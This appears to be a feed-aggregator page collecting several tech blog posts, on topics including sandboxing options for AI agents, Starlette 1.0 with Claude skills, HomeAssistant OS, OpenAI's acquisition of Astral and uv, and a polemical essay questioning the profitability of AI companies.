count to training tokens. For a 340m model that would suggest around 7 billion tokens, more than twice the British Library corpus used here. The smallest Qwen 3.5 model is 600m parameters and that model family starts to get interesting at 2b - so my hunch is we would need 4x or more the training data to get something that starts to feel like a useful conversational partner. But what a fun project! I decided to see if I could run the model on my own machine using my LLM framework. I got Claude Code to do most of the work - here's the transcript . Trip trained the model using Andrej Karpathy's nanochat , so I cloned that project, pulled the model weights and told Claude to build a Python script to run the model. Once we had that working (which ended up needing some extra details from the Space demo source code ) I had Claude read the LLM plugin tutorial and build the rest of the plugin. llm-mrchatterbox is the result. Install the plugin like this: The first time you run a prompt it will fetch the 2.05GB model file from Hugging Face. Try that like this: Or start an ongoing chat session like this: If you don't have LLM installed you can still get a chat session started from scratch using uvx like this: When you are finished with the model you can delete the cached file using: This is the first time I've had Claude Code build a full LLM model plugin from scratch and it worked really well. I expect I'll be using this method again in the future. I continue to hope we can get a useful model from entirely public domain data. The fact that Trip was able to get this far using nanochat and 2.93 billion training tokens is a promising start. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options .

0 views
blog.philz.dev 2 weeks ago

computing 2+2: so many sandboxes

Sandboxes are so in right now. If you're doing agentic stuff, you've now doubt thought about what Simon Willison calls the lethal trifecta : private data, untrusted content, and external communication. If you work in a VM, for example, you can avoid putting a secret on that VM, and then that secret--that's not there!--can't be exfiltrated. If you want to deal with untrusted data, you can also cut off external communication. You can still use an agent, but you need to either limit its network access or limit its tools. So, today's task is to run five ways. Cloud Hypervisor is a Virtual Machine Monitor which runs on top of the Linux Kernel KVM (Kernel-based Virtual Machine) which runs on top of CPUs that support virtualization. A cloud-hypervisor VM sorta looks like a process on the host (and can be managed with cgroups, for example), but it's running a full Linux kernel. With the appropriate kernel options, you can run Docker containers, do tricky networking things, nested virtualization, and so on. Lineage-wise, it's in the same family as Firecracker and crosvm . It avoids implementing floppy devices and tries to be pretty small. Traditionally, people tell you to unpack a file system and maybe make a vinyl out of it using an iso image or some such. A trick is to instead start with a container image for your userspace, and then you get all the niceties (and all the warts) of Docker. Takes about 2 seconds. gVisor implements a large chunk of the Linux syscall interface in a Go process. Think of it as a userland kernel. It came out of Google's AppEngine work. It can use systrap/seccomp, ptrace, and KVM tricks to do the interception. The downside of gVisor is that you can't do some things inside of it. For example, you can't run vanilla Docker inside of gVisor because it doesn't support Docker's networking tricks. Again, let's use Docker to get ourselves a userland. No need for a kernel image. stands for "run secure container." Monty is a Python interpreter written in Rust. It doesn't expose the host, but can call functions that are explicitly exposed. This one's super fast. Pyodide is CPython compiled to WebAssembly. Deno is a JS runtime with permission-based security. Deno happens to run wasm code fine, so we're using it as a wasm runtime. There are other choices. Chromium is probably the world's most popular sandbox. This is pretty much the same as Deno: it's the V8 interpreter under the hood. Lots of ways to drive Chromium. Puppeteer, headless , etc. Let's try rodney : Run pyodide inside Deno inside gVisor inside cloud-hypervisor. Setting up the networking and the file system/disk sharing for these things is usually not trivial, especially if you don't want to accidentally expose the VMs to each other, and so forth. I want to compare two possible agents: a coding agent and a logs agent. A coding agent needs a full Linux, because, at the end of the day, it needs to edit files and run tests and operate git. Your sandboxing options are going to end up being a VM or a container of some sort. A logs agent needs access to your logs (say, the ability to run readonly queries on Clickhouse) and it needs to be able to send you its output. In the minimal case, it doesn't need any sandboxing at all, since it doesn't have access to anything. If you want it to be able to produce a graph, however, it will need to write out a file. At the minimum, it will need to take the results of its queries and pair them with an HTML file that has some JS that renders them with Vegalite. You might also want to mix and match the results of multiple queries, and do some data munging outside of SQL. This is all where a setup like Monty or Pyodide come in handy. Giving the agent access to some Python expands considerably how much the agent can do, and you can do it cheaply and safely with these sandboxes. In this vein, if you use DSPy for RLM, its implementation gives the LLM the Deno/pyodide solution to let the LLM have "infinite" context. Browser-based agents are a thing too. Itsy-Bitsy is a bookmarklet-based agent. It runs in the context of the web page it's operating on. Let me know what other systems I missed!

0 views

SQLAlchemy 2 In Practice - Chapter 2 - Database Tables

This is the second chapter of my SQLAlchemy 2 in Practice book. If you'd like to support my work, I encourage you to buy this book, either directly from my store or on Amazon . Thank you! This chapter provides an overview of the most basic usage of the SQLAlchemy library to create, update and query database tables.

0 views
Simon Willison 3 weeks ago

Experimenting with Starlette 1.0 with Claude skills

Starlette 1.0 is out ! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of FastAPI , which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself. Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own Datasette project was that it didn't yet promise stability, and I was determined to provide a stable API for Datasette's own plugins... albeit I still haven't been brave enough to ship my own 1.0 release (after 26 alphas and counting)! Then in September 2025 Marcelo Trylesinski announced that Starlette and Uvicorn were transferring to their GitHub account , in recognition of their many years of contributions and to make it easier for them to receive sponsorship against those projects. The 1.0 version has a few breaking changes compared to the 0.x series, described in the release notes for 1.0.0rc1 that came out in February. The most notable of these is a change to how code runs on startup and shutdown. Previously that was handled by and parameters, but the new system uses a neat lifespan mechanism instead based around an async context manager : If you haven't tried Starlette before it feels to me like an asyncio-native cross between Flask and Django, unsurprising since creator Kim Christie is also responsible for Django REST Framework. Crucially, this means you can write most apps as a single Python file, Flask style. This makes it really easy for LLMs to spit out a working Starlette app from a single prompt. There's just one problem there: if 1.0 breaks compatibility with the Starlette code that the models have been trained on, how can we have them generate code that works with 1.0? I decided to see if I could get this working with a Skill . Regular Claude Chat on claude.ai has skills, and one of those default skills is the skill-creator skill . This means Claude knows how to build its own skills. So I started a chat session and told it: Clone Starlette from GitHub - it just had its 1.0 release. Build a skill markdown document for this release which includes code examples of every feature. I didn't even tell it where to find the repo, Starlette is widely enough known that I expected it could find it on its own. It ran which is actually the old repository name, but GitHub handles redirects automatically so this worked just fine. The resulting skill document looked very thorough to me... and then I noticed a new button at the top I hadn't seen before labelled "Copy to your skills". So I clicked it: And now my regular Claude chat has access to that skill! I started a new conversation and prompted: Build a task management app with Starlette, it should have projects and tasks and comments and labels And Claude did exactly that, producing a simple GitHub Issues clone using Starlette 1.0, a SQLite database (via aiosqlite ) and a Jinja2 template. Claude even tested the app manually like this: For all of the buzz about Claude Code, it's easy to overlook that Claude itself counts as a coding agent now, fully able to both write and then test the code that it is writing. Here's what the resulting app looked like. The code is here in my research repository . You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options .

0 views
neilzone 3 weeks ago

Moving (for now?) from HomeAssistant in Python venvs to HomeAssistantOS

I have used HomeAssistant for years . So many years, that I do not remember how many. Nothing I do with it is particularly fancy, but things like having my office lights turn on when I open the door if the light is below a certain luminosity, or turning off my Brompton bike charger once it has finished charging, are fun and convenient. We also have solar panels and a battery now, so I will be interested to see if I use HomeAssistant more for that. But anyway. I have been using HomeAssistant, on a Raspberry Pi 4, using Python venvs for years. It has worked absolutely fine for me, and I have (or, at least, had) no compelling reason to change. For me, this was the ideal setup, in that I could set the Pi up how I wanted, in terms of security and monitoring, and just run HomeAssistant on it. Updating HomeAssistant was as easy as running a simple bash script. I liked it. But… that approach is no longer supported, and, where possible, I prefer to use supported means of running software. That means either running HomeAssistantOS, or else using a containerised instance of HomeAssistant. While I could probably find my way through setting up a HomeAssistant container via podman, it would not be my preference, so I decided to give HomeAssistantOS a go, albeit with some trepidation. As expected, it was easy to install HAOS: write the image to a microSD card, and pop it into the Pi. I already had the switch port set up to the right VLAN, so I plugged in the Pi and waited a few minutes. I had anticipated that it would offer https, via a self-signed certificate, so I was a bit baffled to get a TLS error when I connected to it. “Never mind”, I thought. “I’ll just ssh into it and sort it out.” But no, no ssh either. Fortunately, I discovered quite quickly that, out of the box, it does not offer TLS, and I was able to access the web interface. I had taken a backup from my existing HomeAssistant installation, and I used the web interface on the new installation to restore it. It took a few minutes, but restored absolutely everything. I was impressed. I was anticipating - indeed, hoping - to set up TLS and reverse proxying using certbot and nginx. But that is not possible. Instead, I achieved it (reasonably easily, but not as easily as using a command line) via Add-ons from within the HomeAssistant UI. I’d have prefer to have done it the normal way, via ssh, but oh well. Annoyingly, I’d also like to have configured a firewall on the machine, but that is not an option either. I’ve yet to determine if that is going to be a dealbreaker for me, or whether relying on the network-level firewall, controlling access to and from that VLAN, and that machine, will be sufficient. I have also not been able to set up a separate ssh account for my greenbone scanning software, or to configure Wazuh to get the machine talking to my SIEM. Again, I will need to consider the impact of this, but intuitively it does not sit comfortably with me. Nor can I find a way to use restic to backup the configuration and other bits, incrementally and automatically, onto another machine, liked I am used to doing. I will have a poke around with the backup tooling offered but again, this does not enthral me. I want to know that, if there’s a problem, I have a backup on my restic server. Since I have used HomeAssistant for so long, and since I just restored a backup, the most I can say really is that it is all still working. It doesn’t seen faster or slower. The limitations of the appliance-based approach are annoying me, and may be sufficient to drive me towards a container-based approach instead (although that does not appeal to me either). Ultimately, I accept that I am but one user, and perhaps many users do not want the things that I want. Importantly, I am not the developer, and so what I want may simply not be things that they wish to provide. And that is their choice. I guess - personal opinion - that I would prefer a computer and not an appliance .

0 views

SQLAlchemy 2 In Practice - Chapter 1 - Database Setup

Welcome! This is the start of a journey which I hope will provide you with many new tricks to improve how you work with relational databases in your Python applications. Given that this is a hands-on book, this first chapter is dedicated to help you set up your system with a database, so that you can run all the examples and exercises. This is the first chapter of my SQLAlchemy 2 in Practice book. If you'd like to support my work, I encourage you to buy this book, either directly from my store or on Amazon . Thank you!

0 views
Simon Willison 3 weeks ago

Thoughts on OpenAI acquiring Astral and uv/ruff/ty

The big news this morning: Astral to join OpenAI (on the Astral blog) and OpenAI to acquire Astral (the OpenAI announcement). Astral are the company behind uv , ruff , and ty - three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts! The Astral team will become part of the Codex team at OpenAI. Charlie Marsh has this to say : Open source is at the heart of that impact and the heart of that story; it sits at the center of everything we do. In line with our philosophy and OpenAI's own announcement , OpenAI will continue supporting our open source tools after the deal closes. We'll keep building in the open, alongside our community -- and for the broader Python ecosystem -- just as we have from the start. [...] After joining the Codex team, we'll continue building our open source tools, explore ways they can work more seamlessly with Codex, and expand our reach to think more broadly about the future of software development. OpenAI's message has a slightly different focus (highlights mine): As part of our developer-first philosophy, after closing OpenAI plans to support Astral’s open source products. By bringing Astral’s tooling and engineering expertise to OpenAI, we will accelerate our work on Codex and expand what AI can do across the software development lifecycle. This is a slightly confusing message. The Codex CLI is a Rust application, and Astral have some of the best Rust engineers in the industry - BurntSushi alone ( Rust regex , ripgrep , jiff ) may be worth the price of acquisition! So is this about the talent or about the product? I expect both, but I know from past experience that a product+talent acquisition can turn into a talent-only acquisition later on. Of Astral's projects the most impactful by far is uv . If you're not familiar with it, is by far the most convincing solution to Python's environment management problems, best illustrated by this classic XKCD : Switch from to and most of these problems go away. I've been using it extensively for the past couple of years and it's become an essential part of my workflow. I'm not alone in this. According to PyPI Stats uv was downloaded more than 126 million times last month! Since its release in February 2024 - just two years ago - it's become one of the most popular tools for running Python code. Astral's two other big projects are ruff - a Python linter and formatter - and ty - a fast Python type checker. These are popular tools that provide a great developer experience but they aren't load-bearing in the same way that is. They do however resonate well with coding agent tools like Codex - giving an agent access to fast linting and type checking tools can help improve the quality of the code they generate. I'm not convinced that integrating them into the coding agent itself as opposed to telling it when to run them will make a meaningful difference, but I may just not be imaginative enough here. Ever since started to gain traction the Python community has been worrying about the strategic risk of a single VC-backed company owning a key piece of Python infrastructure. I wrote about one of those conversations in detail back in September 2024. The conversation back then focused on what Astral's business plan could be, which started to take form in August 2025 when they announced pyx , their private PyPI-style package registry for organizations. I'm less convinced that pyx makes sense within OpenAI, and it's notably absent from both the Astral and OpenAI announcement posts. An interesting aspect of this deal is how it might impact the competition between Anthropic and OpenAI. Both companies spent most of 2025 focused on improving the coding ability of their models, resulting in the November 2025 inflection point when coding agents went from often-useful to almost-indispensable tools for software development. The competition between Anthropic's Claude Code and OpenAI's Codex is fierce . Those $200/month subscriptions add up to billions of dollars a year in revenue, for companies that very much need that money. Anthropic acquired the Bun JavaScript runtime in December 2025, an acquisition that looks somewhat similar in shape to Astral. Bun was already a core component of Claude Code and that acquisition looked to mainly be about ensuring that a crucial dependency stayed actively maintained. Claude Code's performance has increased significantly since then thanks to the efforts of Bun's Jarred Sumner. One bad version of this deal would be if OpenAI start using their ownership of as leverage in their competition with Anthropic. One detail that caught my eye from Astral's announcement, in the section thanking the team, investors, and community: Second, to our investors, especially Casey Aylward from Accel, who led our Seed and Series A, and Jennifer Li from Andreessen Horowitz, who led our Series B. As a first-time, technical, solo founder, you showed far more belief in me than I ever showed in myself, and I will never forget that. As far as I can tell neither the Series A nor the Series B were previously announced - I've only been able to find coverage of the original seed round from April 2023 . Those investors presumably now get to exchange their stake in Astral for a piece of OpenAI. I wonder how much influence they had on Astral's decision to sell. Armin Ronacher built Rye , which was later taken over by Astral and effectively merged with uv. In August 2024 he wrote about the risk involved in a VC-backed company owning a key piece of open source infrastructure and said the following (highlight mine): However having seen the code and what uv is doing, even in the worst possible future this is a very forkable and maintainable thing . I believe that even in case Astral shuts down or were to do something incredibly dodgy licensing wise, the community would be better off than before uv existed. Astral's own Douglas Creager emphasized this angle on Hacker News today : All I can say is that right now , we're committed to maintaining our open-source tools with the same level of effort, care, and attention to detail as before. That does not change with this acquisition. No one can guarantee how motives, incentives, and decisions might change years down the line. But that's why we bake optionality into it with the tools being permissively licensed. That makes the worst-case scenarios have the shape of "fork and move on", and not "software disappears forever". I like and trust the Astral team and I'm optimistic that their projects will be well-maintained in their new home. OpenAI don't yet have much of a track record with respect to acquiring and maintaining open source projects. They've been on a bit of an acquisition spree over the past three months though, snapping up Promptfoo and OpenClaw (sort-of, they hired creator Peter Steinberger and are spinning OpenClaw off to a foundation), plus closed source LaTeX platform Crixet (now Prism) . If things do go south for and the other Astral projects we'll get to see how credible the forking exit strategy turns out to be. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options .

0 views

Why Are We Still Doing This?

Hi! If you like this piece and want to support my work, please subscribe to my premium newsletter. It’s $70 a year, or $7 a month, and in return you get a weekly newsletter that’s usually anywhere from 5000 to 185,000 words, including vast, extremely detailed analyses of NVIDIA , Anthropic and OpenAI’s finances , and the AI bubble writ large .   I just put out a massive Hater’s Guide To The SaaSpocalypse — an urgent and in-depth analysis of the end of the hypergrowth era of software — and my Hater’s Guides To Private Equity , Anthropic , Oracle and Microsoft are huge (12k+ word) research projects priced lower than the cost of a cup of coffee, which is partly an inflation issue on the part of the coffee shop, but what I’m getting at is this is a ton of value. Where’s Your Ed At Premium is incredibly useful, read by hedge funds, private equity firms, Fortune 500 CEOs, a large chunk of the business and tech media, and quite a few CEOs of major tech firms. I am regularly several steps ahead in my coverage, and you get an absolute ton of value, several books’ worth of content a year. Subscribe today and support my work, I deeply appreciate it. Hey everyone! I know everybody is super excited about the supposed power of AI, but I think it’s time we set some fair ground rules going forward so we stop acting so crazy.   Let’s start with a simple one: AI boosters are no longer allowed to explain what’s good about AI using the future tense. You can no longer say “it will,” “could,” “might,” “likely,” “possible,” “estimated,” “promise,” or any other term that reviews today’s capabilities in the language of the future.  I am constantly asked to explain my opinions (not that anybody who disagrees with me actually reads them ) in the terms of the present, I am constantly harangued for proof of what I believe, and every time I hand it over there’s some sort of ham-fisted response of “it’s getting better” and “it will get even more better from here!’ That’s no longer permissible! I am no longer accepting any arguments that tell me something will happen, or that “things are trending” in a certain way. For an industry so thoroughly steeped in cold, hard rationality, AI boosters are so quick to jump to flights of fancy — to speak of the mythical “AGI” and the supposed moment when everything gets cheaper and also powerful enough to be reliable or effective.  I hear all this crap about AI changing everything, but where’s the proof?  Wow. Anthropic managed to turn $30 billion dollars into $5 billion dollars and start one of the single most annoying debates in internet history. No, really, its CFO Krishna Rao stated on March 9, 2026 in a legal filing that it had made “exceeding” $5 billion in revenue and spent “over” $10 billion on inference and training. None of these numbers line up with previous statements about annualized revenue, by the way — I went into this last week — and no amount of contorting around the meaning of “exceeding” takes away from the fact that adding up all the annualized revenues is over $6 billion, which I believe means that Anthropic defines “annualized” in a new and innovative way. In any case, Anthropic turned $30 billion into $5 billion. That’s…bad. That’s just bad business. And I hear no compelling argument as to how this might improve, other than “these companies need more compute, and then something will happen.” In fact, let’s talk about that for a second. At the end of January, OpenAI CFO Sarah Firar said that “our ability to serve customers—as measured by revenue—directly tracks available compute,” messily suggesting that the more compute you have the more revenue you have.     This is, of course, a big bucket of bollocks. Did OpenAI scale its compute dramatically between hitting $20 billion in annualized revenue (to be clear, I have deep suspicions about these numbers and how OpenAI measures “annualized” revenue) in January 2026 and $25 billion in March 2026 ? I think that’s highly unlikely.  I also have to ask — where are the limited parties, exactly? If revenue scales with revenue, wouldn’t that mean that each increase in compute availability would be allowing somebody to pay OpenAI or Anthropic that couldn’t do so before? I don’t see any reports of customers who can’t pay either company due to a lack of available compute. Are there training runs that can’t be done right now? That doesn’t really make sense either, because training doesn’t automatically lead to more revenue, other than in releasing a new model, I guess?  It’s almost as if every talking point in the generative AI industry is the executives in question saying stuff in the hopes that people will just blindly repeat it! But really folks, we’ve gotta start asking: where’s the money?   Anthropic made $5 billion in its entire existence in revenue and spent $10 billion just on compute . OpenAI claims it made $13.1 billion in revenue in 2025 and “only” lost $8 billion — but those numbers seem unlikely considering my report from November of last year that had OpenAI at $4.3 billion in revenue on $8.67 billion of inference costs through September 2025 , and this is accrual accounting, which means these are from the quarters in question. How likely do you think it is that OpenAI booked $8.8 billion in a quarter (Q4 CY2025) and only lost $8 billion in the year after it lost $12 billion ( per the Wall Street Journal ) in the previous quarter?  Look, I get it! This isn’t a situation where thinking critically is rewarded. Even articles explicitly criticizing the economics of these companies are still filled with weasel wording about “expects to grow” and “anticipates hitting,” or the dreaded phrase “if their bet pays off.” Saying obvious stuff like “every AI company is unprofitable” or “there is no path to profitability” or “nobody is talking about AI revenues” is considered unfair or cynical or contrarian , even though these are very reasonable and logical statements grounded in reality. “But Ed! What about Uber!”  What about Uber? Uber is a completely different business to Anthropic and OpenAI or any other AI company. It lost about $30 billion in the last decade or so, and turned a weird kind of profitable through a combination of cutting multiple markets and business lines (EG: autonomous cars), all while gouging customers and paying drivers less .  The economics are also completely different. Uber does not pay for its drivers’ gas, nor their cars, nor does it own any vehicles. Its PP&E has been between $1.5 billion and $2.1 billion since it was founded . Uber’s revenue does not increase with acquisitions of PP&E, nor does its business become significantly more expensive based on how far a driver drives, how many passengers they might have in a day, or how many meals they might deliver. Uber is, effectively, a digital marketplace for getting stuff or people moved from one place to another, and its losses are attributed to the constant need to market itself to customers for fear that other rideshare (Lyft) or delivery companies (DoorDash, Seamless) might take its cash. Also: Uber’s primary business model was on a ride-by-ride basis, not a monthly subscription. Users may have been paying less , but they were still thinking about each transaction with Uber in terms that made sense when prices were raised ( though it briefly tried an unlimited ride pass option in 2016 ) .  Charging on a ride-by-ride basis was the smartest move that Uber made, as it meant that when prices went up, users didn’t have to change their habits.  AI companies make money either through selling subscriptions (or some sort of token-based access to a model) or by renting their models out via their APIs. One of their biggest mistakes was offering any kind of monthly subscription to their services, because the compute cost of a user is almost impossible to reconcile with any amount they’d pay a month, as the exponential complexity of a task is impossible to predict, both based on user habits and the unreliability of an AI model in how it might try and produce an output.  Let’s give an example. Somebody spending $20 a month on a Claude subscription can spend as much as $163 in compute .  There are two reasons this might be happening: In both cases, Anthropic (and OpenAI, for that matter) is screwed. If we assume Anthropic’s gross margin is 38% ( per The Information , though to be clear I no longer trust any leak from Anthropic, also no, Dario did not say Anthropic had 50% gross margins, it was a hypothetical ), that would mean that $163 of compute costs it $101. Now, not every user is spending that much, but I imagine a lot of users are considering the aggressive ( and deceptive ) media campaign around Claude Code means that a great many are, at the very least, testing the limits of the product. Those on the Max $100 and $200-a-month plans are specifically paying for fewer rate limits, meaning that they are explicitly paying to burn more tokens. The obvious argument that you could make is that Anthropic could simply increase the price of the subscription product, but I need to be clear that for any of this to make sense, it would have to do so by at least 300%, and even then that might not do the job. This would immediately price out most consumers — an $80-a-month subscription would immediately price out just about every consumer, and turn this from a “kind of like the cost of Netflix” purchase into something that has to have obvious, defined results. A $400-a-month or $800-a-month subscription would make a Claude or ChatGPT Pro subscription the size of a car payment. For a company with 100 engineers, a subscription to Claude Max 5x would run at around $480,000 a year. And this is assuming that rate limits stay the same, which I doubt they would.  In any case, there is no future for any AI company that uses a subscription-based approach, at least not one where they don’t directly pass on the cost of compute. This is a huge problem for both Anthropic and OpenAI, as their scurrilous growth-lust means that they’ve done everything they can to get customers used to paying a single monthly cost that directly obfuscates the cost of doing business.  I need to be very direct about what this means, because it’s very important and rarely if ever discussed. A user of ChatGPT or Claude Code is only thinking of “tokens” or “compute” in the most indirect sense — a vague awareness of the model using something to do something else, totally unmoored from the customer’s use of the product. All they see is the monthly subscription cost ($20, $100, or $200-a-month) and rate limits that vaguely say you have X% of your five-hour allowance left. Users are not educated in (nor are they thinking about) their “token burn” or burden on the company, because software has basically never made them do so in the past.  This means it will be very, very difficult to increase subscription costs on users, and near-impossible to convince them to pay the cost of the API. It’s like if Uber, which had charged $20-a-month for unlimited rides, suddenly started charging users their drivers’ gas costs, and gas was at around $250 a gallon.  That might not even do the price disparity justice. This theoretical example still involves users being in the back of a car and being driven a distance, and that said driving costs gas. Token burn is an obtuse, irregular process involving a per-million input and output tokens, with the latter increasing when you use reasoning models, which use output tokens to break down how it might handle a task.  The majority of AI users do not think in these terms, and even technical users that do so have likely been using a monthly subscription which doesn’t make them think about the costs. Think about it — you log onto Claude Code every day and do all your work on it, sometimes bumping into rate limits, then coming back five hours (or however long) later and doing the same thing. Perhaps you’re thinking that a particular task might burn more tokens, or that you should use a model like Claude Sonnet over Claude Opus so that you don’t hit your limits earlier, but you do not, in most cases, even if you know the costs of a model, think about them in a way that’s useful. Let’s say that Anthropic and OpenAI immediately decide to switch everybody to the API. How would anybody actually budget? Is somebody that pays $200 a month for Claude Max going to be comfortable paying $1000 or $1500 or $2500 a month in costs, and have, at that point, really no firm understanding of the cost of a particular action?   First, there’s no way to anticipate how many tokens a prompt will actually burn, which makes any kind of budgeting a non-starter. It’s like going to the supermarket and committing to buy a gallon of milk, not knowing if it’ll cost you $5 or $50.  But also, suppose a prompt doesn’t quite return the result you need, and thus, you’re forced to run it again — perhaps with slightly altered phrasing, or with more exposition to ensure the model has every detail you need. And again, you have no idea how many tokens the model will burn. How does a person budget for that kind of thing?  This is a problem both based on user habits and the unreliability of Large Language Models — such as spending several minutes “thinking” when they get stuck in loops trying to evaluate code or come up with a way to execute a task . User habits are also antithetical to switching from a paid subscription to metered access to models. A user might forgive Claude for chasing its own tail for several minutes when not burdened by the cost of it doing so, but if that act cost $2 or $3 or $10, they may hesitate to use the model at all.  I’ll give you another example. You, a relative novice, decide to use Claude Code to build a dinky little personal website. During the process, Claude Code gets lost, messes up a few little things, taking a few minutes in aggregate, and you calmly tell it to fix things and do what you’d like, and after a little back-and-forth you get something you’re happy with. As you try and upload it to Amazon Web Services, you get stuck, and spend ten minutes getting it to explain how you get the website online. At $20 a month, you might find this process delightful , empowering even. You just coded a website (even if it was a clone of one of thousands of different online templates), and you did so using natural language. Wow! What a magical world we live in. You realize as you look at the website that you forgot to add a section. Doing so takes another half an hour. You bump into your rate limits, take a break for five hours, then come back and finish it at the end of the day. The model has told you the entire time that you’re a genius for making this, and the website rocks , and that you built it , even though you didn’t. If you were paying via the API, this excursion could’ve cost you anywhere from $5 to $15. Every single little back-and-forth begins to add up. Every little change. Every little addition. Every attempt that Claude makes to fix something but makes it worse. Every “I don’t get it” you feed it about AWS.  It’s difficult to actually say what it was that made it expensive or not, and doing so adds a level of cognitive burden on top of the constant vigilance you need to make sure the model doesn’t do something unproductive. Even explicit, direct and well-manicured prompts can lead these models on expensive little expeditions.  Token burn isn’t something that neatly maps to another way that we pay for things outside of cloud storage, and even then, there are very few services that rival the chaotic costs of Large Language Models. Even if people can conceptualize that there are inputs and outputs , the latter of which costs more money, mapping a task to a reliable amount of tokens is actually pretty difficult.  Even if these companies were profitable on inference (I do not believe they are), they are dramatically, horrendously un profitable on subscriptions, and there isn’t a chance in Hell that the majority of those subscriptions convert into token-based API users. When Uber — a completely different business, to be clear — jacked up prices, it did so gradually, and also didn’t ask users to dramatically shift how they think about using the app.  Anthropic and OpenAI have no clean way to jack up prices or cut costs. They can increase subscription fees, but doing so would lead to users paying two to five times what they’re paying today, which would undoubtedly lead to massive churn.  They could also reduce rate limits with the intention of pushing people toward the API, but as I’ve discussed, subscription-based customers are neither educated nor prepared to pay a confusing, metered service that directly counters habits driven by an abundance of token burn. Users are not taught to be considerate of their burn or mindful of their costs when using a subscription-based LLM. The other problem is that these companies don’t really appear to have a way to cut costs, because inference remains very expensive and training costs are never going away : I hear a lot of wank about “ASICs” and “TPUs” that will magically bring down costs. When? How? Oh, NVIDIA’s latest chip is 10x more efficient or some bullshit? Show me the fucking evidence ! Because every time the revenues and costs get reported the revenues seem lower and the costs seem higher.   And it’s completely fucking insane that we don’t have an answer beyond “things will get cheaper” or “prices will go up.” Despite everybody talking about it endlessly for three god damn years, LLMs lack the kind of obvious, replicable, industrially-necessary outcomes that make a 3x, 4x or 10x price increase tenable.  I also think that Anthropic and OpenAI have deliberately used their subscriptions as a means of conning the media into conceptualizing AI as far more affordable than it actually is. Most users do not have any real idea of how much it costs to use these services, let alone how much it costs to run them. All of that glowing, effusive press around Claude Code was based on outcomes that were both subsidized and obfuscated by Anthropic. I think that these articles would’ve been much less positive if the reporters were even aware of the actual costs. So, let’s do some maths shall we? Assume a business has 100 engineers, and currently pays $200 a month for each engineer to use Claude Max, at a cost of $20,000 a month, or $240,000 a year. Let’s assume on average you pay your engineers $125,000, meaning that your salaries are $12.5 million a year, not considering other costs (this is a toy example). Now imagine that Claude switches to a metered billing system.  Let’s assume that, in actuality, these engineers are burning a mere $10 a day in tokens, which brings costs to $365,000 a year, or an increase of $125,000… and remember, this is a team of engineers that were previously used to a subscription that allowed them to spend upwards of $2700 a month in tokens, or nearly 10 times the $300 a month they’re now spending. Let’s be a little more realistic, and bump that number up to $25. Now you’re spending $912,500 a year in tokens. $30 a day puts you over a million bucks. Oops, busy month, you’re now spending $40 a day. Now you’re spending more than 10% of your salaries on compute costs.  Anthropic’s own Claude Code documentation says that the average cost is $6 per-developer-per-day, with “daily costs remaining below $12 for 90% of users.” Good news! If you, as an engineer, can limit your usage to $6 a day, you’re actually saving the company money!  But you’re not spending $6 a day. That’s a silly number for anybody coding. One user on Reddit said that they spent $200-to-300 a day on API costs and decided instead to spend $40 to $50 a day on a GPU cluster on Lambda to use the open source model Qwen 3.5 to handle their code, which still works out at $14,600 in API costs.   Another user found that their parallel Claude Code sessions using Claude’s $200-a-month plan (I assume using multiple accounts) worked out to around $12,000 a month in API costs. Another that hit their limits on their Max subscription “only needed another hour or two to finish a project,” and that hour or two resulted in almost $600 in API costs . Even the boosters are beginning to worry.  Last week, Chamath Palihapitiya made a shockingly reasonable point :  When ROI indeed, Chamath. The fact that one of the most-prominent voices (for better or worse) in the tech industry is unable to get a straight answer to “where is the return on investment” — somebody directly incentivized to keep the party going — should have everybody a little worried. Really though, where is the ROI? Who is actually getting a profit out of this? NVIDIA? The companies that make RAM? Because it doesn’t seem to be the companies who are buying the GPUs. It doesn’t seem to be the AI companies. I don’t think it’s true, but if you believe it, you believe code is truly being automated away — to what end? What are the actual documented economic effects we can point at and what are the actual meaningful changes to the world?  Real data. Something from today, please. You are legally banned from saying the words “soon” or “in the future.” No more future-tense. It’s not allowed. All of my stuff has to be in the present — so yours should too.  Let’s do a quick-fire round: Boosters, I am begging of you — point to one thing TODAY, from TODAY’s models, that even remotely justifies burning nearly a trillion dollars and filling our internet full of slop and creating the moral distance from an action that might have blown up a school and empowering the theft of millions of people’s work and having to hear every fucking day about Sam Altman and Dario Amodei, two terrifyingly boring and annoying oafs with no culture and no whimsy in their wretched little hearts.  Even if you are impressed by what LLMs can do, remember that what you’re impressed by is the result of burning more money than anybody has ever burned on anything, including the Great Financial Crisis’ Troubled Asset Relief Plan (a little over $400 billion) and the COVID Paycheck Protection Program (somewhere between $800 billion and $900 billion). Anthropic and OpenAI have raised (assuming OpenAI gets all the money) over $200 billion in funding, on top nearly $700 billion in capex in 2026 alone across Google, Amazon, Meta, and Microsoft , on top of the $800 billion or so they’ve already spent . I haven’t even included the tens of billions spent by CoreWeave, or the $178.5 billion in US-based data center debt deals from 2025 , or the hundreds of billions of venture dollars that went to AI companies worldwide .  Yet when you look even an inch below the surface, everything seems kind of shit.  Per my Hater’s Guide To The SaaSpocalypse : Every single AI startup without exception does the same thing: turn hundreds of millions of dollars into tens of millions of dollars, or a few billion dollars into a few hundred million dollars. None of them are improving their margins. None of them have a solution.  Every single problem I’ve discussed above about the costs of running Anthropic or OpenAI apply directly to every AI startup, except they have far less venture capital backing and are subject, as Cursor was back in June 2025 , to whatever price increases Anthropic or OpenAI decide, such as adding “priority processing” that’s effectively mandatory to have consistent access to frontier models. Absolutely none of these companies have a plan. The only reason anyone is still humouring them is that the media and venture capital continue to promote the idea that — without explaining how — they will magically find a way of becoming margin positive. When? How? Those are problems for rubes who don’t know we’re living in the future! Let’s hope that venture capital can afford to fund them in perpetuity! They can’t, of course, because venture capital has had dogshit returns since 2018 , and AI startups do not have much intellectual property, as most of them are just wrappers for frontier AI labs who also don’t have any path to profitability. As I covered last week , the story is similar for public companies.  Adobe’s “AI-first” revenue ($375 million ARR) works out to about $60 million a quarter at most for a company that makes $6 billion a quarter. ServiceNow has “$600 million in annual contract value,” an extrapolation of a non-specific period’s revenue that does not actually mean $600 million for a company that makes over $10 billion a year . Salesforce’s Agentforce revenue is $800 million , or roughly $66 